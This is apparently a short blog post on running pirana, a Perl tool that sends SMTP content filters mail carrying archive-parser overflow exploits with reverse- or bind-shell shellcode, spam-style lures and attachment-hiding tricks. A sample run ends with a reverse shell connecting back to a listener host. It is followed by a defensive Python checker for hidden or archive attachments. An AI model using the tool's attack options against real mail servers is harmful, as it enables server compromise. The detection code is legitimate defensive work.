pirana

How to use pirana.

pirana is a framework for checking SMTP content filters.

Options

bt # ./pirana.pl
At least one mandatory option is missing...
Usage: pirana.pl [MANDATORY ARGS] [OPTIONAL ARGS]

Mandatory arguments:
-e+ Exploit number to use (See below)
-h+ SMTP server to test
-a+ Destination email address used in probing


Optional arguments:
-s+ Shellcode type to inject into exploits (See below)
-c+ Cloaking style (See below)
-d+ Try to vanish attachements from MUA's view (See below)
-v Attach EICAR virus to improve stealthness
-z Pack all the malware into a tarball to be less noisy
-p+ Port to use in reverse shell or bind shell
-l+ Host to connect back in reverse shell mode


Valid exploits numbers:
0 OSVDB #5753: LHA get_header File Name Overflow
1 OSVDB #5754: LHA get_header Directory Name Overflow
2 OSVDB #6456: file readelf.c tryelf() ELF Header Overflow
3 OSVDB #11695: unarj Filename Handling Overflow
4 OSVDB #23460: ZOO combine File and Dir name overflow
5 OSVDB #15867: Convert UUlib uunconc integer overflow
6 OSVDB #XXX: ZOO next offset infinite loop DoS


Valid shellcode types:
0 TCP reverse shell
1 UDP reverse shell
2 TCP bind shell


Valid cloaking styles (consult whitepaper for visual result):
0 No cloaking at all (default)
1 Viagra spam message
2 "Look at the pictures I promised you!"


Vanishing techniques for attachements:
0 No vanishing at all (default)
1 Multipart/alternative trick
2 trick

bt # ./pirana.pl -e 0 -h mail.sample.com -a masashi -s 0 -l 192.168.1.2 -p 1234
Generating shellcode in /tmp/raw ... Done!!!
Generating files ranging from offset 0xbfffa000 to 0xbfffffff
...................................................................
The email has been sent to yoshida through mail.sample.com
You should now have a shell on 192.168.1.2:1234 !!!
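As an added defender-side example (not part of pirana or of this post), the following Python check inspects an inbound message for the two things the option list above names: an attachment hidden inside a multipart/alternative container (the "Multipart/alternative trick") and the EICAR test file (the -v option), and it also flags archive attachments of the kinds the exploit list targets, since those are what the content filter will unpack. The archive extension set, the rule names, the sample messages and the matching on the EICAR marker text rather than the full test string are all assumptions of this example.

```python
import os
import email
from email import policy
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

# Archive types the exploit list targets (LHA, ZOO, ARJ, uuencode) plus the
# tarball option (-z); this extension set is an assumption for this example.
ARCHIVE_EXTS = {".lha", ".lzh", ".zoo", ".arj", ".uu", ".uue", ".tar", ".tgz"}
# Only the marker text is matched here, not the full EICAR test string.
EICAR_MARKER = b"EICAR-STANDARD-ANTIVIRUS-TEST-FILE"


def inspect_message(raw: bytes) -> list[tuple[str, str]]:
    """Walk the MIME tree of a raw RFC 822 message and return (rule, filename) findings."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings: list[tuple[str, str]] = []

    def walk(part, ancestors):
        if part.is_multipart():
            for sub in part.iter_parts():
                walk(sub, ancestors + [part.get_content_type()])
            return
        fname = part.get_filename() or ""
        ext = os.path.splitext(fname.lower())[1]
        payload = part.get_payload(decode=True) or b""
        is_attachment = bool(fname) or part.get_content_disposition() == "attachment"
        # "Multipart/alternative trick": an attachment placed inside the
        # alternative container, where a MUA may never show it to the user.
        if is_attachment and "multipart/alternative" in ancestors:
            findings.append(("hidden_in_alternative", fname))
        # Archive attachments are the parts a content filter will try to unpack.
        if ext in ARCHIVE_EXTS:
            findings.append(("archive_attachment", fname))
        # EICAR is the antivirus test file the -v option attaches.
        if EICAR_MARKER in payload:
            findings.append(("eicar_marker", fname))

    walk(msg, [])
    return findings


def build_sample() -> bytes:
    """Constructed sample: an LHA attachment hidden under multipart/alternative
    plus a tarball carrying the EICAR marker. Not real pirana output."""
    alt = MIMEMultipart("alternative")
    alt.attach(MIMEText("plain text body", "plain"))
    alt.attach(MIMEText("<p>html body</p>", "html"))
    hidden = MIMEApplication(b"-lh5-constructed-lha-bytes", "octet-stream")
    hidden.add_header("Content-Disposition", "attachment", filename="pictures.lha")
    alt.attach(hidden)  # attachment nested inside the alternative container

    outer = MIMEMultipart("mixed")
    outer["From"] = "sender@example.invalid"
    outer["To"] = "masashi@example.invalid"
    outer["Subject"] = "Look at the pictures I promised you!"
    outer.attach(alt)
    tarball = MIMEApplication(b"constructed tar bytes " + EICAR_MARKER, "x-tar")
    tarball.add_header("Content-Disposition", "attachment", filename="malware.tar")
    outer.attach(tarball)
    return outer.as_bytes()


def build_benign() -> bytes:
    """Constructed plain-text message with no attachments."""
    msg = MIMEText("hello", "plain")
    msg["From"] = "sender@example.invalid"
    msg["To"] = "masashi@example.invalid"
    msg["Subject"] = "status"
    return msg.as_bytes()


if __name__ == "__main__":
    for rule, fname in inspect_message(build_sample()):
        print(f"{rule}: {fname}")
    print("benign findings:", inspect_message(build_benign()))
```

Run against a milter or a mail spool, the point is the first rule: a content filter that only looks at top-level attachments can miss a part nested under multipart/alternative, so the walk has to descend into every container regardless of its type.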

I don't have a mail server I can seriously test against, so I'll rewrite this properly at some point.
It seems to generate its shellcode from the Metasploit Framework, so if you handle it carelessly the server will get hammered.